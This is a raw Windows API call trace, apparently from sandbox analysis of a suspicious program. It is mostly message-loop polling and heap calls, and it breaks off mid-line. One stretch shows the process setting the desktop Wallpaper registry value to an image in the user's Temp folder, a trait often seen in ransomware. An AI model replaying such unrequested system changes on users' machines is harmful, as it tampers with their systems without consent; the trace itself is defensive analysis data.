[0234.408] timeGetTime () returned 0x117a90d [0234.408] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.408] Sleep (dwMilliseconds=0xa) [0234.425] timeGetTime () returned 0x117a91d [0234.425] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.425] Sleep (dwMilliseconds=0xa) [0234.440] timeGetTime () returned 0x117a92c [0234.440] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.440] Sleep (dwMilliseconds=0xa) [0234.457] timeGetTime () returned 0x117a93c [0234.457] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.457] Sleep (dwMilliseconds=0xa) [0234.471] timeGetTime () returned 0x117a94c [0234.471] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.471] Sleep (dwMilliseconds=0xa) [0234.487] timeGetTime () returned 0x117a95b [0234.487] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.487] Sleep (dwMilliseconds=0xa) [0234.503] timeGetTime () returned 0x117a96b [0234.503] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.503] Sleep (dwMilliseconds=0xa) [0234.519] timeGetTime () returned 0x117a97b [0234.519] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.520] Sleep (dwMilliseconds=0xa) [0234.550] timeGetTime () returned 0x117a99a [0234.550] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.550] Sleep (dwMilliseconds=0xa) [0234.565] timeGetTime () returned 0x117a9a9 [0234.565] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.565] Sleep (dwMilliseconds=0xa) [0234.581] timeGetTime () returned 0x117a9b9 [0234.581] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.581] Sleep (dwMilliseconds=0xa) [0234.596] timeGetTime () returned 0x117a9c9 [0234.596] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.596] Sleep (dwMilliseconds=0xa) [0234.612] timeGetTime () returned 0x117a9d8 [0234.612] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.612] Sleep (dwMilliseconds=0xa) [0234.627] timeGetTime () returned 0x117a9e8 [0234.627] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.627] Sleep (dwMilliseconds=0xa) [0234.644] timeGetTime () returned 0x117a9f7 [0234.644] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.644] Sleep (dwMilliseconds=0xa) [0234.660] timeGetTime () returned 0x117aa07 [0234.660] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.660] Sleep (dwMilliseconds=0xa) [0234.674] timeGetTime () returned 0x117aa17 [0234.674] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.674] Sleep (dwMilliseconds=0xa) [0234.690] timeGetTime () returned 0x117aa26 [0234.690] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.690] Sleep (dwMilliseconds=0xa) [0234.707] timeGetTime () returned 0x117aa36 [0234.707] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.707] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0234.707] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0234.707] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0234.707] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0234.708] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0234.708] RegCloseKey (hKey=0x4e0) returned 0x0 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73370 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0234.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0234.708] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0234.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0234.708] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0234.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0234.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0234.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0234.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0234.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0234.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0234.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0234.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab470 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0234.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0234.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0234.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0234.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0234.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0234.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0234.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0234.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5c0 [0234.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0234.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0234.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0234.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0234.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0234.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0234.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0234.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0234.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0234.711] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0234.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0234.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0234.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0234.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0234.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0234.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0234.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0234.712] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0234.712] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0234.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0234.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0234.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0234.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0234.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0234.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0234.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0234.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0234.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0234.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0234.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0234.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0234.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0234.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0234.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0234.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0234.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0234.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0234.714] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0234.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0234.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0234.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0234.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0234.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0234.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0234.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0234.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0234.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 